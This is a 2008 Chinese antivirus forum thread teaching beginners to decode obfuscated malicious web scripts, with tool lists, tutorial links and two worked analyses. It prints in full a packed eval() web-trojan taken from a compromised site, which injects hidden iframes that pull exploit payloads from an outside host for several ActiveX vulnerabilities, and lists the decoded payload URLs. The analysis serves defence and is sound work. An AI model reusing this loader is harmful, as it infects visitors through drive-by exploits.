71 1234
发新话题
打印

我是一只小菜鸟怎么飞也飞不高——网页脚本解密初探

本主题由 无事无非 于 2008-2-25 11:50 移动

我是一只小菜鸟怎么飞也飞不高——网页脚本解密初探

引用:

写在前面
               首先要感谢认识和不认识的一些朋友,是你们无私的分享让我这只小菜鸟也能够解密简单的加密代码,懒人小G(是你的网页解密教程让我第一次解密出一个网页挂马的),番茄(从你的空间里面获得了FreShow-网页解密辅助工具),网络巡警(你的空间有很多关于漏洞的介绍),鬼仔(你的空间的好东西实在是太多了),六翼刺猬(有很多网站挂马的分析),jimmyleo(感谢你的feShow),正奇(谢谢你的指导),春哥(感谢你的轻轻松松解密各种网页木马)...还有很多人啊 ^_^基本我的空间链接里面都有



引用:

工具的收集:
1,在线网页解密
7jdg的在线解密网站
http://www.cha88.cn/
Monyer的在线解密网站
http://monyer.cn/demo/monyerjs.html
正奇的在线网页解密
http://www.hzqedison.cn/jm.htm
2本地网页解密
2.1 网页源代码的获取
     Httpdug,Malzilla
2.2 网页解密工具
     FreShow,超级网马解密工具(常用于自写函数的解密),ALPHA编码转换器用于real漏洞的解密
2.3 网页嗅探器
     当你不知道怎么解密的时候可以试试用网络嗅探器看看能不能获取下载的网马地址,WSockExpert,网络嗅探器(影音神探)等
引用:

懒人小G的网页解密视频教程
http://www.kingzoo.com/tools/greysign/js/js0.rar
第一课的主要内容是进制转换的解密方法
http://www.kingzoo.com/tools/greysign/js/js1.rar
第二课的主要内容是巩固上一课的进制转换解密,以及关键字修改的技巧
<textarea id="textareaID" rows="50" cols="100"></textarea>;画一个框
<SCRIPT LANGUAGE="javascript">                   ;脚本开始,注意标签
document.getElementById("textareaID").innerText=       ;=号后面的变量内容显示到框里
</SCRIPT>
Execute——alert(或者document.write)
Eval——alert(或者document.write)
http://www.kingzoo.com/tools/greysign/js/js2.rar
第三课的主要内容是S=S+叠加代码的解密思路 这种方法常被网页代码来躲避被杀毒软件查杀的
Document.write——alert
Document.write——教程2里面的那个输出语句
http://www.kingzoo.com/tools/greysign/js/js3.rar
第四课的主要内容还是介绍第二课中的document.getElementById("textareaID").innerText=在网页代码中的解密应用
http://www.kingzoo.com/tools/greysign/js/js4.rar
第五课主要还是第二课中document.getElementById("textareaID").innerText=的应用,有关于httpdug的使用 ^_^
引用:

其他:

2007年度网马漏洞不完全总结(来自网络巡警的百度空间)
http://hi.baidu.com/xyz24k/blog/item/95d0d4c8064cd7147f3e6f83.html
轻轻松松解密各种网页木马
http://bbs.duba.net/thread-21875696-1-1.html




实例分析1:
目标代码一个利用real漏洞的网马(h**p://town.521town.com/wm/rl.js)

1,使用httpdebug获取网页源代码



2,发现是一个典型的real漏洞利用的网马,将codes=后面的内容复制到小G的ALPHA编码转换器里面转换以后就能够得出这个网马下载的地址了




实例分析2
目标网站琴龙乐器(http://bbs.guitarq.com/index.asp

1,使用freshow直接获取网页源代码


最终获取的源代码,是不是很熟悉啊小G的教程里面有介绍吧吧
document.getElementById("textareaID").innerText= 解密吧
复制内容到剪贴板
代码:

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('1E E(){1D(i=2;i<1C;i++){l t=4 W();l s=4 W();l u=F.1B(1A+i);t.6="V:@U:"+u+":\\\\T%S\\\\q%R\\\\q%Q%P%1z.0\\\\O\\\\N.M::/L/K.9";s.6="V:@U:"+u+":\\\\T%S\\\\q%R\\\\q%Q%P%1y.0\\\\O\\\\N.M::/L/K.9";5(t.J==I||s.J==I)H 1x}H 1w}1v="1u&&&&&&&&&&&&&&&&&&&&&&&&1t";l p=4 1s();p.1r(p.1q()+1p*G*G*1o);l D=4 F(8.x);l C="v=";5(!E()&&D.B(C)==-1){k{5(4 o("1n"+"1m.1l"+"1k.1"))8.j(\'<3 h=n:f 6="c://m.b/1j.9"></3>\')}a(e){}k{5(4 o("1i.1h"+"1g"+"1f.1"))8.j(\'<3 h=n:f 6="c://m.b/1e.9"></3>\')}a(e){}k{5(1d.1c.1b().B("A"+"1a 7")==-1)8.j(\'<3 h=n:f 6="c://m.b/A.9"></3>\')}a(e){}k{5(4 o("z"+"y"+".z"+"y.1"))8.j(\'<3 h=d\'+\'19\'+\'17:f 6="c://w\'+\'18\'+\'.b/r\'+\'16.g\'+\'5"></3>\')}a(e){}k{5(4 o("15.14.1"))8.j(\'<3 h=n:f 6="c://m.b/13.9"></3>\')}a(e){}8.x="v=12;11="+p.10();k{5(4 o("Z.Y"))8.j(\'<3 h=n:f 6="c://m.b/X.9"></3>\')}a(e){}}',62,103,'|||iframe|new|if|src||document|gif|catch|vg|http|||none||style||write|try|var|w18|display|ActiveXObject|Then|Kaspersky||bbbbbbbbbbbkis7|bbbbbbbbkis6|rootCookie1||cookie|PCtl|IER|ms|indexOf|cookieHeader|fdsafasdfasdfcookie|bIsKIS|String|60|return|41|height|help|images|chm|context|Doc|20Security|20Internet|20Lab|20Files|Program|MSITStore|mk|Image|xl|Vod|DPClient|toGMTString|expires|POPWINDOS|lz|GLChatCtrl|GLCHAT|eal|lay||isp|ie|toLowerCase|userAgent|navigator|bf|layer|ormP|St|MPS|baidu|ol|To|duBar|Bai|1000|24|getTime|setTime|Date|FDFff454545|xxxx|bbbbbbbbbbbbbsdfdsfdfdf|false|true|207|206|65|fromCharCode|26|for|function'.split('|'),0,{}))
解密后的提取关键的代码,并参考巡警的2007网马总结文章
复制内容到剪贴板
代码:
ActiveXObject("BaiduBar.Tool.1"))--百度搜霸ActiveX控件远程代码执行漏洞
http://w18.vg/baidu.gif
ActiveXObject("MPS.StormPlayer.1"))--暴风影音2 mps.dll组件多个缓冲区溢出漏洞
http://w18.vg/bf.gif
navigator.userAgent.("msie7")--不知道什么漏洞,不能下载下来 ^_^
http://w18.vg/ms.gif
ActiveXObject("IERPCtlIERPCtl.1")--同上
http://w18.vg/real.gif
ActiveXObject("GLCHAT.GLChatCtrl.1")--联众游戏聊天室组件漏洞
http://w18.vg/lz.gif
ActiveXObject("DPClient.Vod")--迅雷5漏洞
http://w18.vg/xl.gif
[ 本帖最后由 一把锈剑 于 2008-2-25 11:07 编辑 ]
本帖最近评分记录
  • 镰刀 威望 +10 精品文章! 2008-3-6 17:13
  • tanlimo 威望 +10 不错,很想给100分,可权限不够 2008-2-25 18:29
  • hooray 威望 +50 精品文章,很好很强大 2008-2-25 13:54
  • slippy 威望 +4 2008-2-25 11:14
  • 无事无非 威望 +34 好帖!还原锈剑归来 2008-2-25 11:09

TOP

部分工具打包上传

[ 本帖最后由 一把锈剑 于 2008-2-25 11:15 编辑 ]

附件

部分网页解密工具软件打包.rar (1.34 MB)

2008-2-25 11:15, 下载次数: 4204

本帖最近评分记录
  • annygi 威望 +5 和我聯繫,俺要你全套解密工具 2008-2-25 11:21

TOP

好帖,学习了
Be good,Do right.

TOP

部分解密我以前涉及到了,想不到,一回來就交功課了。
Annygi留言本 感謝“空指针”對友人D指教,深思更謹慎
爱毒霸社区宗旨是消灭0回复,您的所有问题,在这里都将找到答案
想知道鐵軍、鏽劒等高手如何進行反病毒麼,這裏進入吧…>新手入門
Annygi仅表达个人观点、提供个人建议,并不代表金山官方立场

TOP

  楼主你太帅了

TOP

感谢老大无私分享,文章很详细全面,好好学习下……

TOP

膜拜...膜拜...

TOP

顶上去
Be good,Do right.

TOP

回复 1楼 的帖子

请教各为老师,我买的正版毒霸杀毒软件,服务期到2009年4月,现在升不了级,说是在多台电脑上使用过,被禁用。可我只有一台电脑,也未在其它地方装过,是什么原因呢?

TOP

各位老师好:
我的金山通行证在我从新做系统以后就不好使了。提示是用户太多了,然而我这个通行证仅我使用的一台电脑用过,怎么办啊!
    谢谢!

TOP

精品
提示: 由于该签名含有不和谐字符所以被管理员或版主屏蔽!

TOP

太深奥了~~~谢谢楼主~~支持你~~!!

TOP

谢谢分享,支持
海豚★我永远的ぃ☆灵魂ぷぁ♀蓝色★我一生的☆い信念

设计爱好者请加我QQ849491370

或设计群:57535240让我们一起学习吧!

TOP

这个得好好学学
test

TOP

崇拜中...学习了!

TOP

shihaihong602@163.com

我怎么看了半天都看不懂也!是我太笨还是太难?电脑这东西太多的奥妙了,看来以后还得多学习学习!

TOP

[2008/2/28 23:30:52] Start SetupWizard on INSTALL mode for Kingsoft Internet Security Suit.
[RegisterComponents] ...
  Failed:   Register C:\Program Files\Kingsoft\Kingsoft Internet Security 2008\Flash.OCX with result #5.
  Successfully:   Register C:\Program Files\Kingsoft\Kingsoft Internet Security 2008\KAVEvent.DLL with result #0.
[RegisterServers_DB] ...
  Successfully:   Register BootClean with result #0.
  Successfully:   [WRITE REGISTRY] HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\KavPFW="C:\Program Files\Kingsoft\Kingsoft Internet Security 2008\KAVPFW.exe" with result #0.
  Successfully:   [WRITE REGISTRY] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\KavStart="C:\Program Files\Kingsoft\Kingsoft Internet Security 2008\KAVStart.exe" -startup with result #0.
  Successfully:   Register KISSvc server with result #0.
  Successfully:   Register KWatch server with result #0.
  Failed:   Register KPfwSvc server with result #-2147467259.
[StartService_PFW] ...
  Successfully:   LaunchAppEx for C:\Program Files\Kingsoft\Kingsoft Internet Security 2008\KPfwSvc.EXE -r successfully.
  Failed:   Exit code from C:\Program Files\Kingsoft\Kingsoft Internet Security 2008\KPfwSvc.EXE is -2147467259.
[StartService_DB] ...
  Successfully:   LaunchAppEx for C:\Program Files\Kingsoft\Kingsoft Internet Security 2008\KISSvc.EXE /start successfully.
  Successfully:   Exit code from C:\Program Files\Kingsoft\Kingsoft Internet Security 2008\KISSvc.EXE is 0.
  Successfully:   LaunchAppEx for C:\Program Files\Kingsoft\Kingsoft Internet Security 2008\KWatch.exe /start successfully.
  Failed:   Exit code from C:\Program Files\Kingsoft\Kingsoft Internet Security 2008\KWatch.exe is -2147467259.
  Successfully:   Launch C:\Program Files\Kingsoft\Kingsoft Internet Security 2008\KavStart.exe successfully.

Install Failed!
是怎么回事呀?

TOP

我的天,楼主这个贴子实在太高深了,直看得我云里雾里的,先前看标题才敢进来。
要请教一个问题了:我想安装病毒精灵,不知到什么地方下载,放到那个文件夹里,请各位大侠指点。

TOP

TOP

TOP

 71 1234
发新话题